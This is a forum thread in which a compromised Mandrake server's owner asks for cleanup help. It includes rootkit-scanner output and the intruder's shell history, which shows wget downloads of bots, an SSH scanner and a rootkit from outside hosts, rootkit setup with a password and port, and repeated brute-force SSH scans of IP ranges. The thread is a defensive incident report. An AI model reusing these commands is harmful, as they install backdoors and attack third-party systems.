Ive been hacked
Moved my mandrake 9.2 from one hosting company to another and the new company didnt block ssh traffic too it, and within 2 days Ive been hacked.
They still havent blocked traffic too it so I now have to shutdown sshd everytime Ive finished working on it I cannot afford to clear the machine and start again on it so I need to do my best to clean it and lock it down, so I really need some help from you guys and any help at all is appreciated. Ill just start by saying that I have already deleted several accounts the hacker made and I have also replaced /sbin/init because the system would not let me restart, it kept saying something like: FUCK: trying to hack kernel or something like that anyway Also, this is the bottom of my /etc/rc.d/rc.sysinit file: # Xntps (NTPv3 daemon) startup.. /usr/sbin/xntps -q which I read isnt good Ill post the results from chkrootkit and root kit hunter, along with the history that the user left, and also their ip addresses: CHKROOTKIT: ROOTDIR is `/' Checking `amd'... not found Checking `basename'... not infected Checking `biff'... not found Checking `chfn'... not infected Checking `chsh'... not infected Checking `cron'... not infected Checking `date'... not infected Checking `du'... not infected Checking `dirname'... not infected Checking `echo'... not infected Checking `egrep'... not infected Checking `env'... not infected Checking `find'... not infected Checking `fingerd'... not found Checking `gpm'... not found Checking `grep'... not infected Checking `hdparm'... not infected Checking `su'... not infected Checking `ifconfig'... INFECTED Checking `inetd'... not tested Checking `inetdconf'... not found Checking `identd'... not found Checking `init'... not infected Checking `killall'... not infected Checking `ldsopreload'... can't exec ./strings-static, not tested Checking `login'... not infected Checking `ls'... not infected Checking `lsof'... not infected Checking `mail'... not infected Checking `mingetty'... not infected Checking `netstat'... not infected Checking `named'... not found Checking `passwd'... not infected Checking `pidof'... not infected Checking `pop2'... not found Checking `pop3'... not found Checking `ps'... not infected Checking `pstree'... INFECTED Checking `rpcinfo'... not infected Checking `rlogind'... not found Checking `rshd'... not found Checking `slogin'... not infected Checking `sendmail'... not found Checking `sshd'... not infected Checking `syslogd'... not infected Checking `tar'... not infected Checking `tcpd'... not infected Checking `tcpdump'... not infected Checking `top'... not infected Checking `telnetd'... not found Checking `timed'... not found Checking `traceroute'... not found Checking `vdir'... not infected Checking `w'... not infected Checking `write'... not infected Checking `aliens'... /etc/ld.so.hash Searching for sniffer's logs, it may take a while... nothing found Searching for HiDrootkit's default dir... nothing found Searching for t0rn's default files and dirs... nothing found Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed Searching for Lion Worm default files and dirs... nothing found Searching for RSHA's default files and dir... nothing found Searching for RH-Sharpe's default files... nothing found Searching for Ambient's rootkit (ark) default files and dirs... nothing found Searching for suspicious files and dirs, it may take a while... /lib/security/.config /lib/security/.config Searching for LPD Worm files and dirs... nothing found Searching for Ramen Worm files and dirs... nothing found Searching for Maniac files and dirs... nothing found Searching for RK17 files and dirs... nothing found Searching for Ducoci rootkit... nothing found Searching for Adore Worm... nothing found Searching for ShitC Worm... nothing found Searching for Omega Worm... nothing found Searching for Sadmind/IIS Worm... nothing found Searching for MonKit... nothing found Searching for Showtee... Warning: Possible Showtee Rootkit installed Searching for OpticKit... nothing found Searching for T.R.K... nothing found Searching for Mithra... nothing found Searching for OBSD rk v1... nothing found Searching for LOC rootkit... nothing found Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h Searching for HKRK rootkit... nothing found Searching for Suckit rootkit... nothing found Searching for Volc rootkit... nothing found Searching for Gold2 rootkit... nothing found Searching for TC2 Worm default files and dirs... nothing found Searching for Anonoying rootkit default files and dirs... nothing found Searching for ZK rootkit default files and dirs... nothing found Searching for ShKit rootkit default files and dirs... Possible ShKit rootkit installed Searching for AjaKit rootkit default files and dirs... nothing found Searching for zaRwT rootkit default files and dirs... nothing found Searching for Madalin rootkit default files... nothing found Searching for Fu rootkit default files... nothing found Searching for ESRK rootkit default files... nothing found Searching for rootedoor... nothing found Searching for anomalies in shell history files... nothing found Checking `asp'... not infected Checking `bindshell'... not infected Checking `lkm'... Checking `rexedcs'... not found Checking `sniffer'... not tested: can't exec ./ifpromisc Checking `w55808'... not infected Checking `wted'... not tested: can't exec ./chkwtmp Checking `scalper'... not infected Checking `slapper'... not infected Checking `z2'... not tested: can't exec ./chklastlog Checking `chkutmp'... not tested: can't exec ./chkutmp ROOT KIT HUNTER: Rootkit Hunter 1.1.1 is running Determining OS... Ready Checking binaries * Selftests Strings (command) [ OK ] * System tools Performing 'known good' check... /sbin/chkconfig [ OK ] /sbin/depmod [ OK ] /sbin/ifconfig [ BAD ] /sbin/ifstatus [ OK ] /sbin/init [ OK ] /sbin/insmod [ OK ] /sbin/lsmod [ OK ] /sbin/modinfo [ OK ] /sbin/modprobe [ OK ] /sbin/rmmod [ OK ] /sbin/runlevel [ OK ] /sbin/sulogin [ OK ] /sbin/sysctl [ OK ] /sbin/syslogd [ BAD ] /bin/cat [ OK ] /bin/chmod [ OK ] /bin/chown [ OK ] /bin/egrep [ OK ] /bin/fgrep [ OK ] /bin/grep [ OK ] /bin/id [ OK ] /bin/kill [ OK ] /bin/login [ BAD ] /bin/ls [ BAD ] /bin/more [ OK ] /bin/mount [ OK ] /bin/netstat [ BAD ] /bin/ps [ BAD ] /bin/sh [ OK ] /bin/su [ OK ] /usr/bin/chattr [ OK ] /usr/bin/du [ OK ] /usr/bin/file [ OK ] /usr/bin/find [ BAD ] /usr/bin/head [ OK ] /usr/bin/kill [ OK ] /usr/bin/login [ BAD ] /usr/bin/lsattr [ OK ] /usr/bin/md5sum [ BAD ] /usr/bin/passwd [ BAD ] /usr/bin/top [ BAD ] /usr/bin/vmstat [ OK ] /usr/bin/w [ OK ] /usr/bin/wc [ OK ] /usr/bin/wget [ BAD ] /usr/bin/whereis [ OK ] /usr/bin/who [ OK ] Check rootkits * Default files and directories Rootkit '55808 Trojan - Variant A'... [ OK ] Rootkit 'AjaKit'... [ OK ] Rootkit 'aPa Kit'... [ OK ] Rootkit 'Apache Worm'... [ OK ] Rootkit 'Ambient (ark) Rootkit'... [ OK ] Rootkit 'Balaur Rootkit'... [ OK ] Rootkit 'BeastKit'... [ OK ] Rootkit 'BOBKit'... [ OK ] Rootkit 'CiNIK Worm (Slapper.B variant)'... [ OK ] Rootkit 'Danny-Boy's Abuse Kit'... [ OK ] Rootkit 'Devil RootKit'... [ OK ] Rootkit 'Dica'... [ OK ] Rootkit 'Dreams Rootkit'... [ OK ] Rootkit 'Duarawkz'... [ OK ] Rootkit 'Flea Linux Rootkit'... [ Warning! ] -------------------------------------------------------------------------------- Found parts of this rootkit/trojan by checking the default files and directories Please inspect the available files, by running this check with the parameter --createlogfile and check the log file (current file: /dev/null). -------------------------------------------------------------------------------- Rootkit 'FreeBSD Rootkit'... [ OK ] Rootkit 'Fuck`it Rootkit'... [ OK ] Rootkit 'GasKit'... [ OK ] Rootkit 'Heroin LKM'... [ OK ] Rootkit 'HjC Kit'... [ OK ] Rootkit 'ignoKit'... [ OK ] Rootkit 'ImperalsS-FBRK'... [ OK ] Rootkit 'Irix Rootkit'... [ OK ] Rootkit 'Kitko'... [ OK ] Rootkit 'Knark'... [ OK ] Rootkit 'Li0n Worm'... [ OK ] Rootkit 'Lockit / LJK2'... [ OK ] Rootkit 'MRK'... [ OK ] Rootkit 'RootKit for SunOS / NSDAP'... [ OK ] Rootkit 'Optic Kit (Tux)'... [ OK ] Rootkit 'Oz Rootkit'... [ OK ] Rootkit 'Portacelo'... [ OK ] Rootkit 'R3dstorm Toolkit'... [ OK ] Sebek LKM [ OK ] Rootkit 'Scalper Worm'... [ OK ] Rootkit 'Shutdown'... [ OK ] Rootkit 'SHV4'... [ Warning! ] -------------------------------------------------------------------------------- Found parts of this rootkit/trojan by checking the default files and directories Please inspect the available files, by running this check with the parameter --createlogfile and check the log file (current file: /dev/null). -------------------------------------------------------------------------------- Rootkit 'Sin Rootkit'... [ OK ] Rootkit 'Slapper'... [ OK ] Rootkit 'Sneakin Rootkit'... [ OK ] Rootkit 'Suckit Rootkit'... [ OK ] Rootkit 'SunOS Rootkit'... [ Warning! ] -------------------------------------------------------------------------------- Found parts of this rootkit/trojan by checking the default files and directories Please inspect the available files, by running this check with the parameter --createlogfile and check the log file (current file: /dev/null). -------------------------------------------------------------------------------- Rootkit 'Superkit'... [ OK ] Rootkit 'TBD (Telnet BackDoor)'... [ OK ] Rootkit 'TeLeKiT'... [ OK ] Rootkit 'T0rn Rootkit'... [ OK ] Rootkit 'Trojanit Kit'... [ OK ] Rootkit 'Tuxtendo'... [ OK ] Rootkit 'URK'... [ OK ] Rootkit 'VcKit'... [ OK ] Rootkit 'Volc Rootkit'... [ OK ] Rootkit 'X-Org SunOS Rootkit'... [ OK ] Rootkit 'zaRwT.KiT Rootkit'... [ OK ] * Suspicious files and malware Scanning for known rootkit files [ OK ] Miscellaneous Login backdoors [ OK ] Miscellaneous directories [ OK ] Sniffer logs [ OK ] * Trojan specific characteristics shv4 Checking /etc/rc.d/rc.sysinit Test 1 [ Clean ] Test 2 [ Clean ] Test 3 [ Clean ] Checking /etc/inetd.conf [ Not found ] * Suspicious file properties chmod properties Checking /bin/ps [ Clean ] Checking /bin/ls [ Clean ] Checking /usr/bin/w [ Clean ] Checking /usr/bin/who [ Clean ] Checking /bin/netstat [ Clean ] Checking /bin/login [ Clean ] Script replacements Checking /bin/ps [ Clean ] Checking /bin/ls [ Clean ] Checking /usr/bin/w [ Clean ] Checking /usr/bin/who [ Clean ] Checking /bin/netstat [ Clean ] Checking /bin/login [ Clean ] * OS dependant tests Linux Checking loaded kernel modules... [ OK ] Networking * Check: frequently used backdoors Port 2001: Scalper Rootkit [ OK ] Port 2006: CB Rootkit [ OK ] Port 2128: MRK [ OK ] Port 14856: Optic Kit (Tux) [ OK ] Port 47107: T0rn Rootkit [ OK ] Port 60922: zaRwT.KiT [ OK ] * Interfaces Scanning for promiscuous interfaces [ OK ] System checks * Allround tests Checking hostname... Found. Hostname is xxxx Checking for differences in user accounts... OK. No changes. Checking for differences in user groups... OK. No changes. Checking rc.local file... - /etc/rc.local [ OK ] - /etc/rc.d/rc.local [ OK ] - /usr/local/etc/rc.local [ Not found ] - /usr/local/etc/rc.d/rc.local [ Not found ] - /etc/conf.d/local.start [ Not found ] Checking rc.d files... Processing........................................ ........................................ ........................................ ........................................ ........................................ ............ Result rc.d files check [ OK ] Checking history files Bourne Shell [ OK ] * Filesystem checks Checking /dev for suspicious files... [ OK ] Scanning for hidden files... [ OK ] Security advisories * Check: Groups and Accounts Searching for /etc/passwd... [ Found ] Checking users with UID '0' (root)... [ OK ] * Check: SSH Searching for sshd_config... Found /etc/ssh/sshd_config Checking for allowed root login... Watch out Root login possible. Possible risk! Hint: see logfile for more information info: PermitRootLogin yes Hint: See logfile for more information about this issue Checking for allowed protocols... [ Warning ] info: Users can use SSH1-protocol (see logfile for more information). * Check: Events and Logging Search for syslog configuration... found Checking for running syslog slave... [ OK ] Checking for logging to remote system... [ OK (no remote logging) ] ---------------------------- Scan results ---------------------------- MD5 MD5 compared: 63 Incorrect MD5 checksums: 12 File scan Scanned files: 309 Possible infected files: 3 Possible rootkits: Flea Linux Rootkit SHV4 SunOS Rootkit Scanning took 25 seconds ----------------------------------------------------------------------- Do you have some problems, undetected rootkits, false positives, ideas or suggestions? Please e-mail me by filling in the contact form ----------------------------------------------------------------------- HISTORY: 266 w 267 passwd 268 uname -a 269 cat /proc/cpuinfo 270 uname -a 271 exit 272 w 273 /sbin/ifconfig |grep inet 274 cd /home 275 ls 276 passwd 277 ls 278 useradd craig 279 passwd craig 280 cd /var/tmp 281 cd /tmp 282 cd /var/tmp 283 mkdir ... 284 cd ... 285 wget 286 wget shadowhk.from.ro/bots.tgz 287 tar xzvf bots.tgz 288 rm -rf bots.tgz 289 mv mech in 290 cd in 291 ls 292 pico 293 nano 294 cd .. 295 ls 296 rm -rf in 297 wget users.rol.ro/valitos/Scanner/morfi.gz 298 tar xzvf morfi.gz 299 rm -rf morfi.gz 300 cd morfi 301 ./scan 217.10 302 ./go.sh 217.10 303 rm -rf mfu.txt 304 ./go.sh 212.111 305 ./ssh-scan 100 306 rm -rf mfu.txt 307 ./go.sh 194.97 308 ./go.sh 193.231 309 ./go.sh 208.181 310 ./go.sh 207.236 311 ./go.sh 217.10 312 ./scan 217.10 313 ./go.sh 210.249 314 ./ss 22 -b 210.249 -s 10 315 ./ss 22 -b 148.74 -s 10 316 cd .. 317 ls 318 rm -rf morfi 319 wget geocities.com/larishate/rootkit.tgz 320 tar xzvf rootkit.tgz 321 rm -rf rootkit.tgz 322 cd rootkit 323 ./setup cinema123 55555 324 cd .. 325 ls 326 rm -rf H4ck3rZ rootkit/ 327 exit 328 w 329 uname -a 330 cat /etc/issue 331 useradd luka 332 useradd john 333 passwd john 334 cd /home 335 ls 336 passwd bf2 337 exit 338 useradd craig 339 useradd luka 340 passwd luka 341 cd /var/tmp 342 cd /tmp/... 343 ls -a 344 wget users.rol.ro/valitos/Scanner/morfi.gz 345 tar xzvf morfi.gz 346 rm -rf morfi.gz 347 cd morfi 348 ./go.sh 134.75 -s 10 349 ./go.sh 217.10 350 ./scan 134.75 351 ./scan 64.7 352 ps -x 353 ./ssh-scan 100& 354 exirt 355 exit 356 vi /home/newcomers_cod2/cod2-server/awe3b3/awe.cfg # 357 w 358 cd /var/tmp/... 359 cd /tmp/... 360 ls -a 361 cd morfi 362 cat vuln.txt 363 ./go.sh 217.10 364 ./scan 210.59 365 ps -x 366 ./ss 22 -b 217.20 -s 10 367 mv bios.txt mfu.txt 368 ./ssh-scan 100 369 rm -rf mfu.txt 370 ./ss 22 -b 218.188 -s 10 371 mv bios.txt mfu.txt 372 ./ssh-scan 100 373 rm -rf mfu.txt 374 ./ss 22 -b 216.35 -s 10 375 mv bios.txt mfu.txt 376 ./ssh-scan 100 377 rm -rf mfu.txt 378 ./ss 22 -b 85.36 -s 10 379 mv bios.txt mfu.txt 380 ./ssh-scan 10 381 ./ssh-scan 100 382 rm -rf mfu.txt 383 ./ss 22 -b 196.2 -s 10 384 mv bios.txt mfu,txt 385 mv mfu,txt mfu.txt 386 ./ssh-scan 100 387 rm -rf mfu.txt 388 ./ss 22 -b 217.25 -s 10 389 mv bios.txt mfu.txt 390 ./ssh-scan 100 391 ssh root@195.199.207.129 392 clear 393 rm -rf mfu.txt 394 ./ss 22 -b 207.225 -s 10 395 mv bios.txt mfu.txt 396 ./ssh-scan 100 397 rm -rf mfu.txt 398 ./ss 22 -b 216.183 -s 10 399 mv bios.txt mfu.txt 400 ./ssh-scan 100 401 ssh cisco@216.183.118.170 402 ssh cisco@216.183.118.174 403 w 404 uname -a 405 cat vuln.txt 406 rm -rf mfu.txt 407 ./ss 22 -b 206.210 -s 10 408 mv bios.txt mfu.txt 409 ./ssh-scan 100 410 ./ssh-scan 100& 411 exit 412 cd /var/tmp/.../morfi 413 cd /tmp/.../morfi 414 ./ss 22 -b 217.10 -s 10 415 exit 416 cd /var/tmp/.../morfi 417 cd /tmp/morfi 418 cd /tmp/.../morfi 419 cat vuln.txt 420 ls 421 ./ssh-scan 100 422 rm -rf mfu.txt 423 clear 424 ./ss 22 -b 64.207 -s 10 425 mv bios.txt mfu.txt 426 ./ssh-scan 100 427 rm -rf mfu.txt 428 ./ss 22 -a 133 -s 10 429 mv bios.txt mfu.txt 430 ./ssh-scan 100 431 rm -rf mfu.txt 432 ./ss 22 -b 81.199 -s 10 433 mv bios.txt mfu.txt 434 ./ssh-scan 100 435 rm -rf mfu.txt 436 ./ss 22 -b 199.77 -s 10 437 ./ss 22 -b 194.176 -s 10 438 mv bios.txt mfu.txt 439 ./ssh-scan 100 440 rm -rf mfu.txt 441 ./ss 22 -b 212.192 -s 10 442 ./ss 22 -b 131.1 -s 10 443 ./ss 22 -b 195.159 -s 10 444 mv bios.txt mfu.txt 445 ./ssh-scan 100 446 rm -rf mfu.txt 447 ./ss 22 -b 205.139 -s 10 448 mv bios.txt mfu.txt 449 ./ssh-scan 100 450 rm -rf mfu.txt 451 ./ss 22 -b 63.251 -s 10 452 mv bios.txt mfu.txt 453 ./ssh-scan 100 454 rm -rf mfu.txt 455 ./ss 22 -b 217.89 -s 10 456 mv bios.txt mfu.txt 457 ./ssh-scan 100 458 rm -rf mfu.txt 459 ./ss 22 -b 4.3 -s 10 460 mv bios.txt mfu.txt 461 ./ssh-scan 100 462 rm -rf mfu.txt 463 ./ss 22 -b 151.4 -s 10 464 ./ss 22 -b 210.228 -s 10 465 ./ss 22 -b 132.254 -s 10 466 ./ss 22 -b 217.20 -s 10 467 ./ss 22 -a 217.10 -s 10 468 ./scan 217.10 469 ./ss 22 -b 62.85 -s 10 470 ./ss 22 -b 66.20 -s 10 471 mv bios.txt mfu.txt 472 ./ssh-scan 100 473 rm -rf mfu.txt 474 ./ss 22 -b 62.146 -s 10 475 mv bios.txt mfu.txt 476 ./ssh-scan 100 477 exit 478 cd /tmp/.../morfi 479 rm -rf mfu.txt 480 ./ss 22 -b 196.15 -s 10 481 mv bios.txt mfu.txt 482 ./ssh-scan 100 483 rm -rf mfu.txt 484 ./ss 22 -b 63.142 -s 10 485 rm -rf mfu.txt 486 ./ss 22 -b 66.150 -s 10 487 exit 488 cd /tmp/.../morfi 489 ./scan 217.10 490 ./go.sh 217.10 491 exit 492 cd /tmp/.../morfi 493 ./ss 22 -b 64.35 -s 10 494 ./ss 22 -b 217.10 -s 10 495 exit 496 cd /tmp/.../morfi 497 ./go.sh 217.10 498 ./ss 22 -b 207.38 -s 10 499 mv bios.txt mfu.txt 500 ./ssh-scan 100 501 cd /tmp/.../morfi 502 cat vuln.txt 503 rm -rf mfu.txt 504 ./ss 22 -b 32.97 -s 10 505 mv bios.txt mfu.txt 506 ./ssh-scan 100 507 rm -rf mfu.txt 508 ./ss 22 -b 210.142 -s 10 509 mv bios.txt mfu.txt 510 ./ssh-scan 100 511 rm -rf mfu.txt 512 ./ss 22 -b 63.161 -s 10 513 mv bios.txt mfu.txt 514 ./ssh-scan 100 515 rm -rf mfu.txt 516 ./ss 22 -b 62.49 -s 10 517 ./go.sh 217.10 518 exit 519 cd /tmp/.../morfi 520 ./ss 22 -b 192.116 -s 10 521 ./ss 22 -b 195.74 -s 10 522 exit 523 cd /tmp/.../morfi 524 ./ss 22 -b 131.178 -s 10 525 exit 526 cd /tmp/.../morfi 527 ./ss 22 -b 151.17 -s 10 528 ./ss 22 -b 151.17 -s 6 529 ./ss 22 -b 217.10 -s 6 530 exit 531 cd /tmp/.../morfi 532 ./ss 22 -b 65.89 -s 10 533 exit 534 cd /tmp/.../morfi 535 ./ss 22 -b 69.46 -s 10 536 ./ss 22 -b 217.10 -s 10 537 ./scan 69.46 538 ./scan 151.17 539 ./scan 196.22 540 ./scan 61.39 541 exit 542 cd /tmp/.../morfi 543 rm -rf mfu.txt 544 ./ss 22 -b 193.70 -s 10 545 clear 546 w 547 ./go.sh 202.28 548 ./scan 202.28 549 ./ss 22 -b 217.10 -s 10 550 rm -rf mfu.txt 551 ./ss 22 -b 210.163 -s 10 552 mv bios.txt mfu.txt 553 ./ssh-scan 100 554 rm -rf mfu.txt 555 ./ss 22 -b 212.179 -s 10 556 ./ss 22 -b 217.19 -s 10 557 ./ss 22 -b 198.26 -s 10 558 ./ss 22 -a 198. -s 10 559 cat bios.txt 560 ./ss 22 -a 198. -s 10 561 ./ss 22 -b 212.108 -s 10 562 w 563 clear 564 ./ss 22 -b 65.89 -s 10 565 ./scan 65.89 566 exit 567 cd /tmp/.../morfi 568 ./ss 22 -b 131.234 -s 10 569 mv bios.txt mfu.txt 570 ./ssh-scan 100 571 rm -rf mfu.txt 572 ./ss 22 -b 129.194 -s 10 573 mv bios.txt mfu.txt 574 ./ssh-scan 100 575 rm -rf mfu.txt 576 ./ss 22 -b 131.234 -s 10 577 ./ss 22 -b 209.185 -s 10 578 exit 579 cd /tmp/.../morfi 580 cat vuln.txt 581 rm -rf mfu.txt 582 ./ss 22 -b 209.226 -s 10 583 mv bios.txt mfu.txt 584 ./ssh-scan 100 585 rm -rf mfu.txt 586 ./ss 22 -b 63.143 -s 10 587 ./ss 22 -b 64.210 -s 10 588 mv bios.txt mfu.txt 589 ./ssh-scan 100 590 rm -rf mfu.txt 591 ./ss 22 -b 68.153 -s 10 592 mv bios.txt mfu.txt 593 ./ssh-scan 100 594 rm -rf mfu.txt 595 ./ss 22 -b 129.33 -s 10 596 mv bios.txt mfu.txt 597 ./ssh-scan 100 598 clear 599 rm -rf mfu.txt 600 ./ss 22 -b 142.179 -s 10 601 mv bios.txt mfu.txt 602 ./ssh-scan 100 603 clear 604 exit 605 cd /tmp/.../morfi 606 rm -rf mfu.txt 607 ./ss 22 -b 207.104 -s 10 608 mv bios.txt mfu.txt 609 ./ssh-scan 100 610 rm -rf mfu.txt 611 ./ss 22 -b 209.123 -s 10 612 mv bios.txt mfu.txt 613 ./ssh-scan 100 614 rm -rf mfu.txt 615 ./ss 22 -b 81.201 -s 10 616 mv bios.txt mfu.txt 617 ./ssh-scan 100 618 rm -rf mfu.txt 619 ./ss 22 -b 196.35 -s 10 620 ./ss 22 -b 216.77 -s 10 621 exit 622 cd /tmp/.../morfi 623 ./ss 22 -b 4.35 -s 10 624 ./ss 22 -b 217.10 -s 10 625 ./scan 128.32 626 ls -a 627 cd .. 628 w 629 exit IP ADDRESSES: 194.116.141.81 203.153.167.3 194.116.141.81 194.242.114.44 Like I say, Ideally id like to clean this up and lock it down so any help would be really appreciated Thanks for your time |
Having sshd running shouldn't be a problem, it's most likely poor usernames and passwords being used and not changed since you've migrated. And are you sure this is a dedicated server all on your own? Most host companies make clients share with other clients which could be another cause of it getting hacked.
|
Please do not post the same thread in more than one forum. Picking the most relevant forum and posting it once there makes it easier for other members to help you and keeps the discussion all in one place.
http://www.linuxquestions.org/rules.php Even though you might not like first answer IMO it is the best course of action. |
Fair enough, just thought I might have more views and more relevant in this area
Thanks p.s its definitely my own box, not shared |
Continue here: http://www.linuxquestions.org/questi...d.php?t=392520
|
All times are GMT -5. The time now is 09:53 PM. |